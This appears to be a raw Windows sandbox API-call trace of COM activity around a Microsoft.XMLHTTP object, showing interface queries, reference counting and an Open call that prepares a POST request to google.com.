	[0214.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x629bd0) returned 0x0
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.991] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x629bd0) returned 0x0
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.991] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0214.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c75a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c75a0) returned 0x0
	[0214.992] XMLHTTPRequest:IUnknown:AddRef (This=0x49c75a0) returned 0x3
	[0214.992] XMLHTTPRequest:IUnknown:AddRef (This=0x49c75a0) returned 0x2
	[0214.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c75a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0214.992] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c75a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0214.992] XMLHTTPRequest:IUnknown:AddRef (This=0x49c75a0) returned 0x2
	[0214.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c75a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0214.992] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c75a0, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28da10*=0x0) returned 0x0
	[0214.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf68 | out: ppvObject=0x28cf68*=0x0) returned 0x80004002
	[0214.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf70 | out: ppvObject=0x28cf70*=0x0) returned 0x80004002
	[0214.992] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0214.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d150 | out: ppvObject=0x28d150*=0x629bd0) returned 0x0
	[0214.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bf70 | out: ppvObject=0x28bf70*=0x629bd0) returned 0x0
	[0214.992] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28bfa8 | out: ppvObject=0x28bfa8*=0x0) returned 0x80004002
	[0214.992] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28bf98 | out: ppvObject=0x28bf98*=0x0) returned 0x80004002
	[0214.992] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.992] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c058 | out: ppvObject=0x28c058*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c040 | out: ppvObject=0x28c040*=0x629bd0) returned 0x0
	[0214.993] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c070 | out: ppvObject=0x28c070*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.993] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d168 | out: ppvObject=0x28d168*=0x629bd0) returned 0x0
	[0214.993] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d160 | out: ppvObject=0x28d160*=0x0) returned 0x80004002
	[0214.993] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.993] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0214.993] SysStringLen (param_1=0x0) returned 0x0
	[0214.993] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0214.994] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0214.994] ??2@YAPEAX_K@Z () returned 0x62b540
	[0214.994] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62b540) returned 0x0
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IUnknown:AddRef (This=0x62b540) returned 0x2
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x62b540) returned 0x0
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x62b540) returned 0x0
	[0214.994] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c808 | out: ppvObject=0x28c808*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
	[0214.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x62b540) returned 0x0
	[0214.995] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.995] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x62b540) returned 0x0
	[0214.995] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.995] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
